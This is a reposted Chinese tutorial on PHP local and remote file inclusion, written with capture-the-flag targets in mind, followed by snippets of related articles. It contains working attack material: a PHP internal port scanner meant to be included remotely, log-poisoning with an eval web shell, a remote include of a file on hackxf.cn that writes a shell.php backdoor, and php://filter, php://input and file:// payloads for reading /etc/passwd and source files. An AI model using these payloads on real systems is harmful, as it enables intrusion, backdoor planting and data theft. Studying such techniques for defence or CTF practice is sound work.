文件包含漏洞(RFI)

1文件包含漏洞简介

include require include_once require_once

RFI综述

RFI是Remote File Inclusion的英文缩写，直译过来就是远程文件包含，文件包含的目的是：程序员编写程序时，经常会把需要重复使用的代码写入一个单独的文件中，当需要调用这些代码时，再在其他文件中包含调用代码的文件。

一下是一个扫描端口PHP，可以包含它来探测内网端口

<?php
//echo "<script>alert('SCAN');</script>";
if(isset($_REQUEST['ip'])){$ports = array(80,8080,21,443,3306,22,1,2,1433);$result = array();foreach($ports as $port){if($pf = @fsockopen($_REQUEST['ip'], $port, $err, $err_string, 2)){$result[$port] = true;fclose($pf);}else{$result[$port] = false;}}foreach($result as $port=>$val){$serv = @getservbyport($port, 'TCP');echo "scan port " . $port . " (" . $serv . "):";if($val){//echo 'open'.'<br>';echo "<span style=\"color:green\">open</span><br>";}else{//echo 'close'.'<br>';echo "<span style=\"color:red\">close</span><br>";}}
}
?>

扫描端口

1.本地文件包含漏洞

2.远程文件包含漏洞

条件：php.ini文件中的allow_url_include=On

http://test.com/?page=http://www.baidu.com/index.html

3.常见的敏感文件

1. 根目录下存在flag文件C://flag.txt
2. passwd文件存在flag
/etc/passwd
3. Web根目录下存在 flag文件
4. 当前页面下存在flag文件
5. apache/php/mysql配置文件下存在flag文件
利用phpinfo()函数来获取路径

3重要的利用手法

（1）包含上传的getshell

上传图片马，利用文件包含我们的图片马，菜刀连接

（2）包含日志文件getshell

burpsuite里面访问
http://127.0.0.1/<?php eval($_POST[1]);?>
为了避免在web中进行了url编码，进行报错，把爆错信息写进日志

http://test.com/?page=../apache/logs/error.log
成功

（3）远程文件包含getshell

（4）远程文件包含写shell

包含hackxf.cn下面的get_shell.txt文件，内容

<?php
//fputs()
//fopen(filename, mode)fputs(fopen('shell.php','w'),'<?php eval($_POST[1]);?>');?>

访问当前目录下已经生成的shell.php文件

（5）PHP封装协议读取文件

1 php://filter/read=convert.base64-encode/resource=index.php
2
3 http://test.com/?page=php://filter/read=convert.base64-encode/resource=index.php

（6）PHP封装协议命令执行

http://127.0.0.1/cmd.php?file=php://input[POST DATA] <?php phpinfo()?>

（7）file封装协议读取文件

http://test.com/?page=file://c:/flag.txt

转载于:https://www.cnblogs.com/hackxf/p/8933169.html

文件包含漏洞(RFI)相关推荐

文件上传漏洞之——远程文件包含漏洞(RFI)
定义如果php.ini的配置选项allow_url_include为On的话,文件包含函数是可以加载远程文件的,这种漏洞被称为远程文件包含漏洞.利用远程文件包含漏洞,可以直接执行任意命令原理同本 ...
文件包含漏洞实例操作
文件包含漏洞实例操作参考文章本地文件包含漏洞无限制本地文件包含漏洞 session文件包含漏洞有限制本地文件包含漏洞 %00截断路径长度截断点号截断远程文件包含漏洞无限制远程文件包含漏 ...
文件包含漏洞（LFI、RFI）（require()、include()函数）
文章目录一.文件包含漏洞分类二.文件包含漏洞原理三.文件包含函数四.测试是否存在本地文件包含(LFI)漏洞五.文件包含漏洞实例 "百度杯"CTF比赛 2017 二月场in ...
Kali学习笔记31：目录遍历漏洞、文件包含漏洞
文章的格式也许不是很好看,也没有什么合理的顺序完全是想到什么写一些什么,但各个方面都涵盖到了能耐下心看的朋友欢迎一起学习,大牛和杠精们请绕道目录遍历漏洞: 应用程序如果有操作文件的功能,限制不严 ...
代码审计中的文件包含漏洞
0x00 背景文件包含漏洞是php语言的一大特性.文件包含的意思是,服务器在执行PHP文件时,可以通过文件包含函数加载另一个文件中的PHP代码并执行,这会为开发者节省大量的时间.而文件包含漏洞的出现 ...
php本地文件包含漏洞,php文件包含漏洞利用小结
漏洞概述: 文件包含漏洞是指客户端(一般为浏览器)用户通过输入控制动态包含在服务器的文件,从而导致恶意代码的执行及敏感信息的泄露,主要包括本地文件包含LFI和远程文件包含RFI两种形式. 产生原因: ...
fopen打开ftp文件_PHP文件包含漏洞利用思路与Bypass总结手册（一）
作者:Qftm 合天智汇前言这个手册主要是记录针对PHP文件包含漏洞的利用思路与Bypass手法的总结. 相关函数四个函数 php中引发文件包含漏洞的通常主要是以下四个函数: 1.include ...
文件包含原理及本地文件包含漏洞演示（本地文件，远程包含文件的测试）
一.文件包含漏洞概述 1.定义:文件包含漏洞是一种最常见的漏洞类型,它会影响依赖于脚本运行时的web应用程序.当应用程序使用攻击者控制的变量构建可执行代码的路径时,文件包含漏洞会导致攻击者任意控制运行 ...
文件包含漏洞及简单绕过
文件包含漏洞文章目录文件包含漏洞 DVWA靶场对文件包含漏洞的解释 About Objective 漏洞发生原因防御与绕过 DVWA File inclusion medium 绝对目录绕过双 ...

文件包含漏洞(RFI)

文件包含漏洞(RFI)相关推荐

最新文章

热门文章